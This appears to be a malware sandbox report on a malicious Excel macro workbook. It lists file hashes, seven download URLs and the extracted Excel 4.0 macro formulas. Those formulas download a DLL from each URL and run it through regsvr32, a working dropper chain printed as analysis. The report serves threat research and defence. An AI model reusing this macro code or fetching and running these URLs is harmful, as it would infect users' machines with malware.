Overview

overview

10

Static

static

10

6e6c674d5c...9.xlsm

windows7-x64

10

6e6c674d5c...9.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    6e6c674d5cc7b727661f90019d29578733e3aa791a26747298f4fd1e8fce8cf9

  • Size

    29KB

  • Sample

    241121-az7l3s1pfn

  • MD5

    3e3a01295ed9448b02ba3f26ad3b142c

  • SHA1

    4e592a05b7d687745e245b9d3c8153c7bf80f3ca

  • SHA256

    6e6c674d5cc7b727661f90019d29578733e3aa791a26747298f4fd1e8fce8cf9

  • SHA512

    4c612b17db67103ad34a5cae43375dd1c39ffe253d24eb86d904b1f47a21ac030b07562a8296dc3638329a982198cc98d5a66f66ac7dd1d3a9c121b64539d5ae

  • SSDEEP

    384:RvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:ZqUtVNZAXby9y+cccS1AsuIjxl

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://iqraacfindia.org/wp-admin/dG/

https://he.adar-and-ido.com/wp-admin/xk7D/

https://www.digigoal.fr/wp-admin/VfU0aIj/

https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/

https://al-brik.com/vb/mMQlbHPCX/

https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/

https://biantarajaya.com/awstats-icon/VR5wDEvBj/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://iqraacfindia.org/wp-admin/dG/","..\whxc.dll",0,0) =IF('IJEGVS'!H16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://he.adar-and-ido.com/wp-admin/xk7D/","..\whxc.dll",0,0)) =IF('IJEGVS'!H18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.digigoal.fr/wp-admin/VfU0aIj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb/mMQlbHPCX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/","..\whxc.dll",0,0)) =IF('IJEGVS'!H26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://biantarajaya.com/awstats-icon/VR5wDEvBj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\whxc.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://iqraacfindia.org/wp-admin/dG/
xlm40.dropper

https://he.adar-and-ido.com/wp-admin/xk7D/
xlm40.dropper

https://www.digigoal.fr/wp-admin/VfU0aIj/
xlm40.dropper

https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/
xlm40.dropper

https://al-brik.com/vb/mMQlbHPCX/
xlm40.dropper

https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/
xlm40.dropper

https://biantarajaya.com/awstats-icon/VR5wDEvBj/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://iqraacfindia.org/wp-admin/dG/
xlm40.dropper

https://he.adar-and-ido.com/wp-admin/xk7D/
xlm40.dropper

https://www.digigoal.fr/wp-admin/VfU0aIj/

Targets

    • Target

      6e6c674d5cc7b727661f90019d29578733e3aa791a26747298f4fd1e8fce8cf9

    • Size

      29KB

    • MD5

      3e3a01295ed9448b02ba3f26ad3b142c

    • SHA1

      4e592a05b7d687745e245b9d3c8153c7bf80f3ca

    • SHA256

      6e6c674d5cc7b727661f90019d29578733e3aa791a26747298f4fd1e8fce8cf9

    • SHA512

      4c612b17db67103ad34a5cae43375dd1c39ffe253d24eb86d904b1f47a21ac030b07562a8296dc3638329a982198cc98d5a66f66ac7dd1d3a9c121b64539d5ae

    • SSDEEP

      384:RvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:ZqUtVNZAXby9y+cccS1AsuIjxl

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks